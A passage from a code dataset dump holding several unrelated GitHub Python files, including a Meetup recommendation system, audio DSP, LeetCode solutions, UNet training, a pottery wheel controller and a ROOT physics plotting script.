search.group(1)\n                else:\n                    word = ''\n                print(word)\n                lst.remove(word)\n            else:\n                break\n    return tags_lists\n\n\ndef transforming_in_bow(text, lemmatizer):\n    \n    sentence = text.translate(str.maketrans('', '',string.punctuation)).split(' ')\n    bow = []\n    for word in sentence:\n        lowcase_text_word=word.lower()\n        lemmatized_word=lemmatizer.lemmatize(lowcase_text_word)\n        if lemmatized_word not in stop_words:\n            bow.append(lemmatized_word)\n    return bow\n\ndef tags_from_text(bow, model):\n    while True:\n        if len(bow) == 0:\n            return []\n        try:\n            tags=model.wv.most_similar(positive=bow, topn=20)\n        except KeyError as e:\n            search = re.search(\"'(\\w+)'\", e.args[0])\n            if search:\n                word = search.group(1)\n            else:\n                word = '' \n            print(word)\n            bow.remove(word)\n        else:\n            return tags\n    \n\n\n\n\n\n\ndef relevance(tags_text, tags_groups, model):\n    distance_lists_max=[]\n    for group in tags_groups:\n        group_id=[]\n        for tag_g in group:\n            for tag in tags_text:\n                distance=model.wv.distance(tag[0], tag_g[0])\n                proportion=1-distance\n                relevance=proportion*tag[1]\n                group_id.append(relevance)\n        distance_lists_max.append(max(group_id))\n    return distance_lists_max\n\n\n\ndef relevance_mean(tags_text, tags_groups, model):\n    distance_lists_max=[]\n    for group in tags_groups:\n        group_id=[]\n        for tag_g in group:\n            for tag in tags_text:\n                distance=model.wv.distance(tag[0], tag_g[0])\n                proportion=1-distance\n                relevance=proportion*tag[1]\n                group_id.append(relevance)\n        distance_lists_max.append(statistics.mean(group_id))\n    return distance_lists_max\n\ndef relevance_count(tags_text, tags_groups, model):\n    distance_lists_max=[]\n    for group in tags_groups:\n        group_id=[]\n        for tag_g in group:\n            for tag in tags_text:\n                distance=model.wv.distance(tag[0], tag_g[0])\n                proportion=1-distance\n                relevance=proportion*tag[1]\n                if relevance>=0.7:\n                    group_id.append(relevance)\n        distance_lists_max.append(len(group_id))\n    return distance_lists_max\n\ndef relevance_words(bow, bow_gr, model):\n    distance_lists_max=[]\n    for group in bow_gr:\n        group_id=[]\n        for tag_g in group:\n            for tag in bow:\n                try:\n                    distance=model.wv.distance(tag, tag_g)\n                except KeyError:\n                    # word is missing from the model vocabulary; skip it so that\n                    # 'distance' is never referenced before assignment and the\n                    # list is not mutated while being iterated\n                    continue\n                proportion=1-distance\n                group_id.append(proportion)\n        distance_lists_max.append(statistics.mean(group_id))\n    return distance_lists_max\n\n\n\n\n\n\n\n\n\n\ndef get_the_recommended_titles(relevance, titles_data):\n    \n    distance_list_titles=pd.DataFrame(relevance, columns=['member'])\n    titles_values=pd.merge(left=titles_data[['group_name']], right=distance_list_titles, left_index=True, right_index=True)\n    high_values=titles_values.loc[titles_values['member']>=0.10]\n    recommended_gr=high_values.loc[high_values['member']>=(high_values['member'].max()-0.03)]\n    sorted_rec_gr = recommended_gr.sort_values('member', ascending=False)\n    \n    return sorted_rec_gr\n\n\n\ndef get_the_recommended_titles_count(relevance, titles_data):\n    \n    distance_list_titles=pd.DataFrame(relevance, columns=['member'])\n    titles_values=pd.merge(left=titles_data[['group_name']], right=distance_list_titles, left_index=True, right_index=True)\n    high_values=titles_values.loc[titles_values['member']>=1]\n    recommended_gr=high_values.loc[high_values['member']>=(high_values['member'].max()-10)]\n    sorted_rec_gr = recommended_gr.sort_values('member', ascending=False)\n    \n    return sorted_rec_gr\n\n\n\n\ndef input_text_recommendation(text, model, tags_groups, group_titles):\n    bow = transforming_in_bow(text,lemmatizer)\n    tags_text=tags_from_text(bow, model)\n    if len(tags_text) == 0:\n        return \"No recommendations.\"\n    
tags_relevance=relevance(tags_text, tags_groups, model)\n    recommended=get_the_recommended_titles(tags_relevance, group_titles).head(10)\n    return recommended[['group_name']]\n\n\ndef input_text_recommendation_mean(text, model, tags_groups, group_titles):\n    bow = transforming_in_bow(text,lemmatizer)\n    tags_text=tags_from_text(bow, model)\n    if len(tags_text) == 0:\n        return \"No recommendations.\"\n    tags_relevance=relevance_mean(tags_text, tags_groups, model)\n    recommended=get_the_recommended_titles(tags_relevance, group_titles).head(10)\n    return recommended[['group_name']]\n\n\ndef input_text_recommendation_count(text, model, tags_groups, group_titles):\n    bow = transforming_in_bow(text,lemmatizer)\n    tags_text=tags_from_text(bow, model)\n    if len(tags_text) == 0:\n        return \"No recommendations.\"\n    tags_relevance=relevance_count(tags_text, tags_groups, model)\n    recommended=get_the_recommended_titles_count(tags_relevance, group_titles).head(10)\n    return recommended[['group_name']]\n\ndef input_text_recommendation_words(text, model, groups_bow, group_titles):\n    bow = transforming_in_bow(text,lemmatizer)\n#    tags_text=tags_from_text(bow, model)\n#    if len(tags_text) == 0:\n#        return \"No recommendations.\"\n    tags_relevance=relevance_words(bow, groups_bow, model)\n    recommended=get_the_recommended_titles(tags_relevance, group_titles).head(10)\n    return recommended[['group_name']]\n\n\n\n\ndef transform_concat_lists(df):\n    lst=df.values.tolist()\n    big_list=[]\n    for small_lst in lst:\n        big_list+=small_lst\n    return big_list\n\ndef perf_measure(y_actual, y_hat):\n    TP = 0\n    FP = 0\n    TN = 0\n    FN = 0\n    for i in range(len(y_hat)): \n        if y_actual[i]==y_hat[i]==1:\n            TP += 1\n        if y_hat[i]==1 and y_actual[i]!=y_hat[i]:\n            FP += 1\n        if y_actual[i]==y_hat[i]==0:\n            TN += 1\n        if y_hat[i]==0 and y_actual[i]!=y_hat[i]:\n            FN += 1\n    print('TP=',TP,'FP=',FP,'TN=',TN,'FN=',FN)\n    return TP, FP, TN, FN\n    \n    \n    \n    ","repo_name":"inesa-lisnic/A-recommendation-system-paradigm-based-on-Meetup-database","sub_path":"algorithm_functions.py","file_name":"algorithm_functions.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16673493255","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\nimport scipy.io.wavfile as wavfile\n\nfs, x = wavfile.read(\"Python/Examples/h1.wav\")\n\n\n\n\nT = 1500\nx = x[0:T]\nx_range = np.arange(0,len(x)/fs,1/fs)\n\n\n\n#x = np.abs(x) / np.max(x)\nsch_sum = np.cumsum(x[::-1]**2)[::-1]\nsch_sum_db = 10.0 * np.log10(sch_sum / np.max(sch_sum))\n\nsch_trapz = integrate.cumtrapz(x[::-1]**2,initial=0)[::-1]\nsch_trapz_db = 10.0 * np.log10(sch_trapz / np.max(sch_trapz))\n\nplt.plot(x_range,sch_trapz_db)\nplt.plot(x_range,sch_sum_db)\nplt.xlabel(\"Time in [s]\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Schroeder backward integration\")\nplt.show()","repo_name":"DennisR96/Audio_DSP","sub_path":"Python/Examples/Schroeder.py","file_name":"Schroeder.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72988256212","text":"import heapq\nimport math\nfrom typing import List\n\nclass Solution:\n    def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n        adj_list = dict()\n        distance = [math.inf for i in range(n)]\n        distance[k-1] =0\n        time = 0 \n        pq = []\n        heapq.heapify( pq)\n        heapq.heappush(pq, [time, k])\n        for u, v, w in times:\n            if not adj_list.get(u, False):\n                adj_list[u] = []\n            if not 
adj_list.get(v, False):\n                adj_list[v] = []\n            adj_list[u].append((v,w))\n        while pq:\n            Totaltime, node = heapq.heappop(pq)\n            for neigh, time in adj_list[node]:\n                if distance[neigh-1] > Totaltime + time:\n                    distance[neigh-1] = Totaltime + time\n                    heapq.heappush(pq, [distance[neigh-1], neigh])\n        if max(distance) == math.inf:\n            return -1 \n        return max(distance)","repo_name":"prbln/Leetcode","sub_path":"744-network-delay-time/network-delay-time.py","file_name":"network-delay-time.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27867519299","text":"import sys, os, copy, gc, re, gzip, pickle, argparse, logging, warnings\nimport numpy as np\nimport pandas as pd\nimport matplotlib.colors\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom ficture.utils.visualize_factors import visual_hc, image_to_base64\n\ndef factor_report(_args):\n\n    parser = argparse.ArgumentParser(prog=\"factor_report\")\n    parser.add_argument('--path', type=str, help='')\n    parser.add_argument('--pref', type=str, help='')\n    parser.add_argument('--model_id', type=str, default='', help='')\n    parser.add_argument('--color_table', type=str, default='', help='')\n    parser.add_argument('--n_top_gene', type=int, default=20, help='')\n    parser.add_argument('--min_top_gene', type=int, default=10, help='')\n    parser.add_argument('--max_pval', type=float, default=0.001, help='')\n    parser.add_argument('--min_fc', type=float, default=1.5, help='')\n    parser.add_argument('--output_pref', type=str, default='', help='')\n\n    parser.add_argument('--hc_tree', action='store_true')\n    parser.add_argument('--n_top_gene_on_tree', type=int, default=10, help='')\n    parser.add_argument('--tree_figure', type=str, default='', help='')\n    parser.add_argument('--cprob_cut', type=str, default='.99', help='Only visualize top factors with cumulative probability > cprob_cut')\n    parser.add_argument('--model', type=str, default='', help='')\n    parser.add_argument('--circle_if', type=int, default=24, help='')\n    parser.add_argument('--remake_tree', action='store_true')\n    parser.add_argument('--circle', action='store_true')\n    parser.add_argument('--vertical', action='store_true')\n    args = parser.parse_args(_args)\n\n    path=args.path\n    pref=args.pref\n    ntop = args.n_top_gene\n    mtop = args.min_top_gene\n    pval_max = args.max_pval\n    fc_min = args.min_fc\n    ejs = os.path.join(os.path.dirname(__file__), \"factor_report.template.html\")\n    if not os.path.isfile(ejs):\n        sys.exit(f\"Template file {ejs} not found\")\n    if args.remake_tree or args.circle or args.vertical:\n        args.hc_tree = True\n\n    model_id = args.model_id\n    if model_id == '':\n        model_id = args.pref\n\n    output_pref = args.output_pref\n    if output_pref == '':\n        output_pref = path+\"/\"+pref\n\n    # Color code\n    color_f = args.color_table\n    if os.path.isfile(args.color_table):\n        color_table = pd.read_csv(args.color_table, sep='\\t')\n    else:\n        color_f = path+\"/figure/\"+model_id+\".rgb.tsv\"\n        color_table = pd.read_csv(color_f, sep='\\t')\n    K = color_table.shape[0]\n    factor_header = np.arange(K).astype(str)\n    color_table.Name = color_table.Name.astype(int)\n    color_table.sort_values(by = 'Name', inplace=True)\n    color_table.index = color_table.Name.values\n    color_table['RGB'] = [','.join(x) for x in np.clip((color_table.loc[:, ['R','G','B']].values * 255).astype(int), 0, 255).astype(str) ]\n    color_table['HEX'] = [ matplotlib.colors.to_hex(v) for v in np.array(color_table.loc[:, ['R','G','B']]) ]\n    node_color = {str(i):v['HEX'] 
for i,v in color_table.iterrows() }\n\n\n # Posterior count\n f=path+\"/\"+pref+\".posterior.count.tsv.gz\"\n post = pd.read_csv(f, sep='\\t')\n recol = {}\n for u in post.columns:\n v = re.match('^[A-Za-z]*_*(\\d+)$', u.strip())\n if v:\n recol[v.group(0)] = v.group(1)\n post.rename(columns=recol, inplace=True)\n post_umi = post.loc[:, factor_header].sum(axis = 0).astype(int).values\n post_weight = post.loc[:, factor_header].sum(axis = 0).values\n post_weight /= post_weight.sum()\n\n # DE genes\n f=path+\"/DE/\"+pref+\".bulk_chisq.tsv\"\n de = pd.read_csv(f, sep='\\t')\n de.factor = de.factor.astype(int)\n top_gene = []\n top_gene_anno = []\n de['Rank'] = 0\n # Temporary: shorten unspliced gene names\n de.gene = de.gene.str.replace('unspl_', 'u_')\n # Top genes by Chi2\n de.sort_values(by=['factor','Chi2'],ascending=False,inplace=True)\n for k in range(K):\n v = de.loc[de.factor.eq(k), 'gene'].iloc[:args.n_top_gene_on_tree].values\n top_gene_anno.append(', '.join(v))\n de.loc[de.factor.eq(k), 'Rank'] = np.arange(de.factor.eq(k).sum())\n v = de.loc[de.factor.eq(k) & ( (de.Rank < mtop) | \\\n ((de.pval <= pval_max) & (de.FoldChange >= fc_min)) ), \\\n 'gene'].iloc[:ntop].values\n if len(v) == 0:\n top_gene.append([k, '.'])\n else:\n top_gene.append([k, ', '.join(v)])\n # Top genes by fold change\n de.sort_values(by=['factor','FoldChange'],ascending=False,inplace=True)\n for k in range(K):\n de.loc[de.factor.eq(k), 'Rank'] = np.arange(de.factor.eq(k).sum())\n v = de.loc[de.factor.eq(k) & ( (de.Rank < mtop) | \\\n ((de.pval <= pval_max) & (de.FoldChange >= fc_min)) ), \\\n 'gene'].iloc[:ntop].values\n if len(v) == 0:\n top_gene[k].append('.')\n else:\n top_gene[k].append(', '.join(v))\n # Top genes by absolute weight\n for k in range(K):\n v = post.gene.iloc[np.argsort(post.loc[:, str(k)].values)[::-1][:ntop] ].values\n top_gene[k].append(', '.join(v))\n\n # Summary\n table = pd.DataFrame({'Factor':np.arange(K), 'RGB':color_table.RGB.values,\n 'Weight':post_weight, 'PostUMI':post_umi,\n 'TopGene_pval':[x[1] for x in top_gene],\n 'TopGene_fc':[x[2] for x in top_gene],\n 'TopGene_weight':[x[3] for x in top_gene] })\n table.sort_values(by = 'Weight', ascending = False, inplace=True)\n\n f = output_pref+\".factor.info.tsv\"\n table.to_csv(f, sep='\\t', index=False, header=True, float_format=\"%.5f\")\n\n f = output_pref+\".factor.info.tsv\"\n with open(f, 'r') as rf:\n lines = rf.readlines()\n header = lines[0].strip().split('\\t')\n rows = [ list(enumerate(row.strip().split('\\t') )) for row in lines[1:]]\n\n # Load template\n env = Environment(loader=FileSystemLoader(os.path.dirname(ejs)))\n template = env.get_template(os.path.basename(ejs))\n\n image_base64 = None\n tree_alt = None\n tree_caption = None\n\n if args.hc_tree:\n # Hierarchical clustering\n m = re.match(\"^[0\\.]*(\\d+)$\", args.cprob_cut)\n if m is None:\n sys.exit(f\"Invalid --cprob_cut, please use a number between 0 and 1 (e.g. 
0.99)\")\n        cprob_label = m.group(1)\n        cprob_cut = float(args.cprob_cut)\n\n        tree_f = args.tree_figure\n        if not os.path.exists(args.tree_figure) or args.remake_tree:\n            tree_f = os.path.dirname(color_f) + '/' + pref + \".coshc.\"+cprob_label+\".tree.png\"\n            if not os.path.exists(tree_f) or args.remake_tree:\n                model_f = args.model\n                if not os.path.exists(args.model):\n                    model_f = path + \"/\" + model_id + \".model_matrix.tsv.gz\"\n                if not os.path.exists(model_f):\n                    print(\"Cannot find model file, will cluster based on posterior count\")\n                    model = post\n                else:\n                    model = pd.read_csv(model_f, sep='\\t')\n                model_prob = np.array(model.iloc[:, 1:]).T + .1\n                model_prob = model_prob / model_prob.sum(axis = 1).reshape((-1,1))\n\n                circle = args.circle\n                if not circle and args.circle_if > 0:\n                    v = np.argsort(post_weight)[::-1]\n                    w = np.cumsum(post_weight[v] )\n                    k = np.arange(K)[w > cprob_cut][0]\n                    if k > args.circle_if:\n                        circle = True\n                tree = visual_hc(model_prob, post_weight, top_gene_anno, \\\n                    node_color = node_color, circle = circle, \\\n                    output_f = tree_f, cprob_cut = cprob_cut)\n                print(f\"Tree figure path: {tree_f}\")\n        image_base64 = image_to_base64(tree_f)\n\n        tree_alt = \"Hierarchical clustering of factors based on pairwise cosine distance\"\n        tree_caption = \"Clustering of factors based on pairwise cosine distance. Factors with high abundance jointly accounting for \" + args.cprob_cut + \" of observations are displayed.\"\n\n    # Render the HTML file\n    html_output = template.render(header=header, rows=rows, image_base64=image_base64, tree_image_alt=tree_alt, tree_image_caption=tree_caption)\n\n    f=output_pref+\".factor.info.html\"\n    with open(f, \"w\") as html_file:\n        html_file.write(html_output)\n\n    print(f)\n","repo_name":"seqscope/ficture","sub_path":"ficture/scripts/factor_report.py","file_name":"factor_report.py","file_ext":"py","file_size_in_byte":8446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20373555901","text":"#!/usr/bin/python3\n\"\"\"Maria and Ben are playing a game.\n    Given a set of consecutive integers\n    starting from 1 up to and including n,\n    they take turns choosing a prime number\n    from the set and removing that number\n    and its multiples from the set.\n    The player that cannot make a move loses the game.\n\"\"\"\n\n\ndef isWinner(x, nums):\n    \"\"\" isWinner \"\"\"\n    player = {\"Maria\": 0, \"Ben\": 0}\n    n = max(nums)\n    primes = [0, 0, 2]\n    add_prime(max(nums), primes)\n    for round in range(x):\n        _sum = sum((i != 0 and i <= nums[round])\n                   for i in primes[:nums[round] + 1])\n        if (_sum % 2):\n            winner = \"Maria\"\n        else:\n            winner = \"Ben\"\n        if winner:\n            player[winner] += 1\n    if player[\"Maria\"] > player[\"Ben\"]:\n        return \"Maria\"\n    elif player[\"Ben\"] > player[\"Maria\"]:\n        return \"Ben\"\n\n    return None\n\n\ndef add_prime(n, primes):\n    \"\"\" Add prime to list \"\"\"\n    last_prime = primes[-1]\n    if n > last_prime:\n        for i in range(last_prime + 1, n + 1):\n            if isPrime(i):\n                primes.append(i)\n            else:\n                primes.append(0)\n\n\ndef isPrime(number):\n    \"\"\" check prime number \"\"\"\n    for i in range(2, int(number ** 0.5) + 1):\n        if not number % i:\n            return False\n    return True\n","repo_name":"Oluwateezzy/alx-interview","sub_path":"0x0A-primegame/0-prime_game.py","file_name":"0-prime_game.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25738387060","text":"# color\nred = '\\033[91m'\ngreen = '\\033[92m'\nyellow = 
'\033[93m'\nblue = '\033[94m'\nreset = '\033[0m'\n\nglobal error_display \nglobal info_display\nglobal ok_display\n\nerror_display = True\ninfo_display = False\nok_display = True\n\ndef ERRORF(msg):\n    if error_display:\n        print(\"{}[-][ERROR]{} {}\".format(red, reset, msg))\n\ndef INFOF(msg):\n    if info_display:\n        print(\"{}[+][INFO]{} {}\".format(yellow, reset, msg))\n\ndef OKF(msg):\n    if ok_display:\n        print(\"{}[+][OK]{} {}\".format(green, reset, msg))\n","repo_name":"valour01/arm_disasssembler_study","sub_path":"adapter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"67"} +{"seq_id":"22740185615","text":"\"\"\"\nThis problem was asked by Microsoft.\n\nA number is considered perfect if its digits sum up to exactly 10.\n\nGiven a positive integer n, return the n-th perfect number.\n\nFor example, given 1, you should return 19. Given 2, you should return 28.\n\"\"\"\n\n# the first perfect num is 19\n# the second perfect num is 28\n# the third perfect num is 37\n\n# closer look reveals:\n# n=1, 2,  3,  4,  5,  6,  7,  8,  9,  10,  11,  12\n# -----------------------------------------------\n# 19, 28, 37, 46, 55, 64, 73, 82, 91, 100, 109, 118\n\n# so roughly 19 + (n-1)*9\n\n# but there is one problem in this method: the 10th number -> 100 is not a perfect num\n# 10th number should be the next one then 10th=>109\n# so we'll also need to push 11th num to be the 12th num and so on\n\n# note that the outliers of this method exist in form of {100, 199, 299, 1000, 10000, etc. all nums that don't sum to 10}\n# before we return the result we need to adjust for the outliers:\n\n# the result should be\n# n= 1, 2,  3,  4,  5,  6,  7,  8,  9,  10,  11,  12\n# -----------------------------------------------\n# 19, 28, 37, 46, 55, 64, 73, 82, 91, 109, 118, 127\n\n\ndef find_perfect_num(n):\n    if n ==0:\n        return 'nums start from 1'\n\n    n_th_num = 19  # start with 19\n    count = 0  # iterator\n\n    while(True):\n        curr_sum = sum(list(map(int, str(n_th_num))))\n\n        if curr_sum ==10:\n            count+=1\n\n        if count == n:\n            return n_th_num\n\n        n_th_num += 9\n\n#\n# def outliers(n):  # experiment to see if there is a pattern to the outliers -> There isn't :(\n#     l=[]\n#\n#     for i in range(1, n):\n#         num = ((i+1)*9)+1\n#\n#         s = sum(list(map(int, str(num))))\n#\n#         if s!=10:\n#             l.append(num)\n#\n#     return l\n\n\nif __name__ == '__main__':\n    # print(find_perfect_num(1))\n    # print(find_perfect_num(9))\n    # print(find_perfect_num(11))\n    # print(find_perfect_num(21))\n    # print(find_perfect_num(91))\n    # print(find_perfect_num(88))\n    #\n    for i in range(1, 101):\n        print(\"{}#: {}\".format(i, find_perfect_num(i)))\n\n    # print(outliers(2001))","repo_name":"RafayAK/CodingPrep","sub_path":"DailyCodingProblem/70_Microsoft_Perfect_Numbers_Sum_to_10.py","file_name":"70_Microsoft_Perfect_Numbers_Sum_to_10.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"2824601222","text":"import os\nimport ctypes\n\n\nclass FileUtils:\n    @staticmethod\n    def create_hidden_folder(folder_name):\n        # current working directory\n        current_directory = os.getcwd()\n\n        # full path\n        path = os.path.join(current_directory, folder_name)\n\n        # create the folder\n        os.makedirs(path, exist_ok=True)\n\n        # on Windows, mark the folder as hidden\n        if os.name == \"nt\":\n            FILE_ATTRIBUTE_HIDDEN = 0x02\n            ret = ctypes.windll.kernel32.SetFileAttributesW(path, FILE_ATTRIBUTE_HIDDEN)\n\n            if not ret:\n                print(\n                    f\"Could not set {folder_name} as hidden. 
Error code: {ctypes.GetLastError()}\"\n                )\n","repo_name":"MoonShineVFX/smaug-cmd","sub_path":"smaug_cmd/ui/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40378564035","text":"from micropython import const\nfrom machine import Pin\n\nfrom libs.PID import PID\n\nfrom config import Config\nfrom display import Display\nfrom on_off_switch import OnOffSwitch\nfrom pedal_input import PedalInput\nfrom rotary import Rotary\nfrom speed_measure import Tachometer\nfrom speed_control import SpeedControl\n\n\nclass PotteryWheelManager:\n    STOPPED_HOLD_STATE = const(\"STOPPED_HOLD\")  # when first stopping, we stop motor and wait for safety conditions\n    STOPPED_WAIT_STATE = const(\"STOPPED_WAIT\")  # once safety conditions are met we wait for indication to start running\n    RUNNING_STATE = const(\"RUNNING\")\n\n    def __init__(self, pedal_input: PedalInput, main_switch: OnOffSwitch, tachometer: Tachometer,\n                 speed_control: SpeedControl, display: Display, rotary: Rotary) -> None:\n        super().__init__()\n\n        self.pedal_input = pedal_input\n        self.main_switch = main_switch\n        self.tachometer = tachometer\n        self.speed_control = speed_control\n        self.display = display\n        self.rotary = rotary\n        self.rotary.add_handler(self.create_rotary_event_handler())\n\n        self._state = self.STOPPED_HOLD_STATE\n        self._maxRpm = Config.DEFAULT_MAX_RPM\n\n    def create_rotary_event_handler(self):\n        \"\"\"create a callback with no \"self\" parameter, so it can be passed as a handler\"\"\"\n        def event_handler(event_type):\n            if event_type == Rotary.ROT_CW:\n                self._maxRpm = min(self._maxRpm + 1, Config.MAX_SUPPORTED_RPM)\n            elif event_type == Rotary.ROT_CCW:\n                self._maxRpm = max(self._maxRpm - 1, 0)\n            elif event_type == Rotary.SW_PRESS:\n                print('PRESS')\n            elif event_type == Rotary.SW_RELEASE:\n                print('RELEASE')\n\n        return event_handler\n\n    def loop(self):\n        percentage = self.pedal_input.get_pedal_percentage()\n        current_speed = self.tachometer.get_current_rpm()\n\n        if self._state == self.STOPPED_HOLD_STATE:\n            # make sure we are switched off\n            self.main_switch.switch_off()\n            self.speed_control.set_speed(0)\n            if percentage == 0:\n                self._state = self.STOPPED_WAIT_STATE\n\n        elif self._state == self.STOPPED_WAIT_STATE:\n            # if we made it here, we are already giving stop signals\n\n            if percentage > 0:  # This indicates we need to start running\n                self._state = self.RUNNING_STATE\n\n        elif self._state == self.RUNNING_STATE:\n            self.main_switch.switch_on()\n","repo_name":"alonkashtan/pottery-wheel-control","sub_path":"pottery-wheel-manager.py","file_name":"pottery-wheel-manager.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14149509357","text":"from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping\nfrom model_UNet import get_unet, UNetEvaluator\nfrom config import *\nfrom generators import get_seg_batch\nimport time\n\ndef seg_train():\n    print('start seg_train')\n    model = get_unet()\n    model.summary()\n\n    run = '{}-{}'.format(time.localtime().tm_hour, time.localtime().tm_min)\n    log_dir = SEG_LOG_DIR.format(run)\n    check_point = log_dir + '/checkpoint-{epoch:02d}-{val_loss:.4f}.hdf5'\n\n    print(\"seg train round {}\".format(run))\n    tensorboard = TensorBoard(log_dir=log_dir, write_graph=False)\n    checkpoint = ModelCheckpoint(filepath=check_point, monitor='val_loss', 
verbose=1, save_best_only=True)\n early_stopping = EarlyStopping(monitor='val_loss', patience=TRAIN_SEG_EARLY_STOPPING_PATIENCE, verbose=1)\n evaluator = UNetEvaluator()\n model.fit_generator(get_seg_batch(TRAIN_SEG_TRAIN_BATCH_SIZE, from_train=True), steps_per_epoch=TRAIN_SEG_STEPS_PER_EPOCH,\n validation_data=get_seg_batch(TRAIN_SEG_VALID_BATCH_SIZE, from_train=False), validation_steps=TRAIN_SEG_VALID_STEPS,\n epochs=TRAIN_SEG_EPOCHS, verbose=2,\n callbacks=[tensorboard, checkpoint, early_stopping, evaluator])\n\nif __name__ == '__main__':\n seg_train()\n","repo_name":"wikke/Tianchi-Medical-LungTumorDetect","sub_path":"train_segmentation.py","file_name":"train_segmentation.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"67"} +{"seq_id":"28027270327","text":"\"\"\"\nGiven a string s, return the longest\npalindromic\n\nsubstring\n in s.\n\n\n\nExample 1:\n\nInput: s = \"babad\"\nOutput: \"bab\"\nExplanation: \"aba\" is also a valid answer.\nExample 2:\n\nInput: s = \"cbbd\"\nOutput: \"bb\"\n\"\"\"\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n n = len(s)\n if n < 2:\n return s\n start, max_len = 0, 1\n for i in range(n):\n odd = s[i - max_len - 1: i + 1]\n even = s[i - max_len: i + 1]\n # print('odd:', odd, ' even:' ,even,'i:', i,'start:', start,'max_lan:', max_len, i - max_len - 1, i - max_len)\n if i - max_len - 1 >= 0 and odd == odd[::-1]:\n start = i - max_len - 1\n max_len += 2\n continue\n if i - max_len >= 0 and even == even[::-1]:\n start = i - max_len\n max_len += 1\n return s[start: start + max_len]\n\nprint(Solution().longestPalindrome('abcdeedcba'))\n","repo_name":"laxman590249/Data-Structures","sub_path":"DataStructures/Strings/longest_palindromic_substring.py","file_name":"longest_palindromic_substring.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4890755178","text":"import ROOT\nimport CMS_lumi, tdrstyle\nimport array\nfrom subprocess import Popen\nfrom sys import argv, exit, stdout, stderr\nimport math\n\nROOT.gROOT.SetBatch(True)\n\nsaveWhere= '/afs/hep.wisc.edu/home/tost/workingArea/CMSSW_8_0_24_patch1/src/Real_work/oct12plots/'\n\n#filenumber = raw_input(\"How many files to plot? 
\")\nfilenumber = str(5)\ntitle = \"words\"\n\n#legend_title = []\ninfile = []\nfor n in range(0, int(filenumber)):\n infile.append(argv[n+1])\n #legend_title.append(raw_input(\"What to label \"+str(infile[n])+\": \"))\n\n#some sloppy programming is going to go here\nlegend_title = []\nlegend_title.append(\"Znunu\")\nlegend_title.append(\"smH125\")\nlegend_title.append(\"W+jets\")\nlegend_title.append(\"DiBoson\")\nlegend_title.append(\"Z+jets\")\n\n\n\n########################## All cuts go here ########################\ndef muTauCutTester(event):\n if event.met>150 and event.m_vis<125 and event.pth>120 and event.dR<1.7 and event.pt_1>26 and event.pt_2>20 and event.npv>0 and event.diLeptons==0 and event.charge==0 and event.againstElectronVLooseMVA6_2 > 0 and event.againstMuonTight3_2>0 and event.iso04_1<0.15 and (event.HLT_IsoMu24_v_fired>0 or event.HLT_IsoTkMu24_v_fired>0) and event.byTightIsolationMVArun2v1DBoldDMwLT_2>0 and event.BadMuonFilter==1 and event.Flag_eeBadScFilter_fired == 1 and event.Flag_HBHENoiseFilter_fired == 1 and event.Flag_HBHENoiseIsoFilter_fired == 1 and event.Flag_goodVertices_fired == 1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired == 1:\n return True\ndef eleTauCutTester(event):\n if event.met>150 and event.pth>120 and event.m_vis<125 and event.dR<1.7 and event.pt_1>26 and event.pt_2>20 and event.vertices>0 and event.dilepton_veto==0 and event.iso_1<0.1 and event.tightElectrons<=1 and event.tightMuons==0 and event.charge==0 and event.againstElectronTightMVA6_2 > 0 and event.againstMuonLoose3_2>0 and event.byTightIsolationMVArun2v1DBoldDMwLT_2>0 and event.BadMuonFilter==1 and event.Flag_HBHENoiseFilter_fired==1 and event.Flag_HBHENoiseIsoFilter_fired==1 and event.Flag_globalTightHalo2016Filter_fired==1 and event.Flag_goodVertices_fired==1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired==1:\n return True\ndef diTauCutTester(event):\n if event.met>160 and event.m_vis<125 and event.pth>120 and event.dR<2.1 and event.pt_1>55 and event.pt_2>40 and event.npv>0 and event.tightMuons==0 and event.tightElectrons==0 and event.againstMuonLoose3_1>0 and event.againstElectronVLooseMVA6_1>0 and event.againstElectronVLooseMVA6_2>0 and event.charge==0 and (event.HLT_DoubleMediumIsoPFTau35_Trk1_eta2p1_Reg_v_fired>0 or event.HLT_DoubleMediumCombinedIsoPFTau35_Trk1_eta2p1_Reg_v_fired>0):\n return True\ndef datamuTauCutTester(event):\n if event.BadMuonFilter==1 and event.Flag_eeBadScFilter_fired == 1 and event.Flag_HBHENoiseFilter_fired == 1 and event.Flag_HBHENoiseIsoFilter_fired == 1 and event.Flag_goodVertices_fired == 1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired == 1:\n return True\ndef dataeleTauCutTester(event):\n if event.Flag_eeBadScFilter_fired==1 and event.BadMuonFilter==1 and event.Flag_HBHENoiseFilter_fired==1 and 